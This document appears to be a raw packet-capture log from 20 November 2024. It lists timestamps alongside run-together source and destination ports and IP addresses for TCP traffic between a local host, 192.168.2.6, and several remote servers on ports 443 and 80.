                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.661258936 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.661981106 CET49979443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662003040 CET44349979204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662173986 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662195921 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662221909 CET49979443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662225008 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662245989 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662280083 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662285089 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662321091 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662338018 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662497044 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662539959 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.662554026 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.663039923 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.663075924 CET49978443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.663096905 CET44349978204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.663450956 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.663472891 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.663506031 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.663512945 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.663547993 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.665535927 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.665556908 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667001009 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667043924 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667058945 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667064905 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667112112 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667788982 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667808056 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667835951 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667843103 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.667864084 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.668031931 CET49982443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.668045044 CET44349982104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.668102980 CET49982443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.668982029 CET49979443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.668992043 CET44349979204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.669357061 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.669429064 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.669588089 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.669617891 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.669646025 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.669652939 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.669692039 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.669958115 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.670064926 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.670547962 CET49982443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.670558929 CET44349982104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.670696974 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.670717001 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.670756102 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.670763016 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.670802116 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.672255993 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.672277927 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.672321081 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.672327995 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.672352076 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.672887087 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673151970 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673226118 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673248053 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673258066 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673281908 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673285961 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673302889 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673310041 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673327923 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673355103 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673634052 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.673649073 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.674120903 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.674128056 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.676258087 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.676285028 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.679610014 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.679619074 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.719330072 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.719333887 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734225035 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734258890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734273911 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734291077 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734354019 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734354019 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734400034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734416962 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734431982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734445095 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734468937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734468937 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734488964 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734504938 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734519958 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734519958 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734520912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734536886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734555006 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734572887 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734572887 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734600067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734690905 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734942913 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.734960079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.735001087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.735249996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.735265017 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.735279083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.735302925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.735302925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.735325098 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.735934019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.735946894 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.736061096 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.736077070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.736104012 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.736155033 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.736155033 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.736516953 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.736534119 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.736579895 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.737050056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.737066031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.737112999 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.737204075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.737344027 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.737514973 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.737549067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.737673998 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.737699986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738066912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738090038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738106012 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738107920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738121033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738137960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738152027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738166094 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738169909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738190889 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738204002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738204002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738205910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738223076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738239050 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738254070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738260031 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738260031 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738270998 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738291979 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738301039 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738323927 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738337040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738337994 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738337040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738357067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738372087 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738389969 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738400936 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738400936 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738401890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738426924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738442898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738449097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738449097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738456964 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738472939 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738487959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738497972 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738497972 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738502979 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738519907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738548994 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738549948 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738549948 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738569975 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738573074 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738590002 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738590956 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738605976 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738622904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738632917 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738637924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738655090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738658905 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738670111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738687038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738699913 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738699913 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738701105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738729000 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738729954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738754988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738770008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738784075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738796949 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738801003 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738812923 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738830090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738835096 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738835096 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738857031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738867044 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738873005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738887072 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738902092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738919020 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738926888 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738935947 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738950968 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738954067 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738965034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738993883 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738995075 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.738995075 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739011049 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739026070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739042997 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739057064 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739063978 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739063978 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739074945 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739090919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739106894 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739106894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739106894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739123106 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739137888 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739145994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739145994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739152908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739171028 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739171028 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739171028 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739188910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739206076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739217997 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739217997 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739234924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739249945 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739264011 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739264011 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739265919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739283085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739296913 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739320040 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739329100 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739329100 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739335060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739345074 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739350080 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739352942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739368916 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739382982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739398956 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.739412069 CET4991080192.168.2.6185.215.113.206
